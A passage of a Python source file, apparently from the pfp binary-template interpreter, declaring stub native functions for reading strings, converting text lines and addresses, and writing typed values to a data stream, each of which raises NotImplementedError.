@native(name="ReadString", ret=pfp.fields.String)
def ReadString(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int ReadStringLength( int64 pos, int maxLen=-1 )
@native(name="ReadStringLength", ret=pfp.fields.Int)
def ReadStringLength(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# wstring ReadWLine( int64 pos, int maxLen=-1 )
@native(name="ReadWLine", ret=pfp.fields.WString)
def ReadWLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# wstring ReadWString( int64 pos, int maxLen=-1 )
@native(name="ReadWString", ret=pfp.fields.WString)
def ReadWString(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int ReadWStringLength( int64 pos, int maxLen=-1 )
@native(name="ReadWStringLength", ret=pfp.fields.Int)
def ReadWStringLength(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextAddressToLine( int64 address )
@native(name="TextAddressToLine", ret=pfp.fields.Int64)
def TextAddressToLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextAddressToColumn( int64 address )
@native(name="TextAddressToColumn", ret=pfp.fields.Int)
def TextAddressToColumn(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextColumnToAddress( int64 line, int column )
@native(name="TextColumnToAddress", ret=pfp.fields.Int64)
def TextColumnToAddress(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextGetNumLines()
@native(name="TextGetNumLines", ret=pfp.fields.Int64)
def TextGetNumLines(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextGetLineSize( int64 line, int includeLinefeeds=true )
@native(name="TextGetLineSize", ret=pfp.fields.Int)
def TextGetLineSize(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextLineToAddress( int64 line )
@native(name="TextLineToAddress", ret=pfp.fields.Int64)
def TextLineToAddress(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextReadLine( char buffer[], int64 line, int maxsize, int includeLinefeeds=true )
@native(name="TextReadLine", ret=pfp.fields.Int)
def TextReadLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextReadLineW( wchar_t buffer[], int64 line, int maxsize, int includeLinefeeds=true )
@native(name="TextReadLineW", ret=pfp.fields.Int)
def TextReadLineW(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void TextWriteLine( const char buffer[], int64 line, int includeLinefeeds=true )
@native(name="TextWriteLine", ret=pfp.fields.Void)
def TextWriteLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void TextWriteLineW( const wchar_t buffer[], int64 line, int includeLinefeeds=true )
@native(name="TextWriteLineW", ret=pfp.fields.Void)
def TextWriteLineW(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteByte( int64 pos, char value )
@native(name="WriteByte", ret=pfp.fields.Void)
def WriteByte(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteDouble( int64 pos, double value )
@native(name="WriteDouble", ret=pfp.fields.Void)
def WriteDouble(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteFloat( int64 pos, float value )
@native(name="WriteFloat", ret=pfp.fields.Void)
def WriteFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteHFloat( int64 pos, float value )
@native(name="WriteHFloat", ret=pfp.fields.Void)
def WriteHFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteInt( int64 pos, int value )
@native(name="WriteInt", ret=pfp.fields.Void)
def WriteInt(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteInt64( int64 pos, int64 value )
@native(name="WriteInt64", ret=pfp.fields.Void)
def WriteInt64(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteQuad( int64 pos, int64 value )
@native(name="WriteQuad", ret=pfp.fields.Void)
def WriteQuad(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteShort( int64 pos, short value )
@native(name="WriteShort", ret=pfp.fields.Void)
def WriteShort(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUByte( int64 pos, uchar value )
@native(name="WriteUByte", ret=pfp.fields.Void)
def WriteUByte(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUInt( int64 pos, uint value )
@native(name="WriteUInt", ret=pfp.fields.Void)
def WriteUInt(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUInt64( int64 pos, uint64 value )
@native(name="WriteUInt64", ret=pfp.fields.Void)
def WriteUInt64(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUQuad( int64 pos, uint64 value )
@native(name="WriteUQuad", ret=pfp.fields.Void)
def WriteUQuad(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUShort( int64 pos, ushort value )
@native(name="WriteUShort", ret=pfp.fields.Void)
def WriteUShort(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteBytes( const uchar buffer[], int64 pos, int n )
@native(name="WriteBytes", ret=pfp.fields.Void)
def WriteBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteString( int64 pos, const char value[] )
@native(name="WriteString", ret=pfp.fields.Void)
def WriteString(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteWString( int64 pos, const wstring value )
@native(name="WriteWString", ret=pfp.fields.Void)
def WriteWString(params, ctxt, scope, stream, coord):
raise NotImplementedError()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.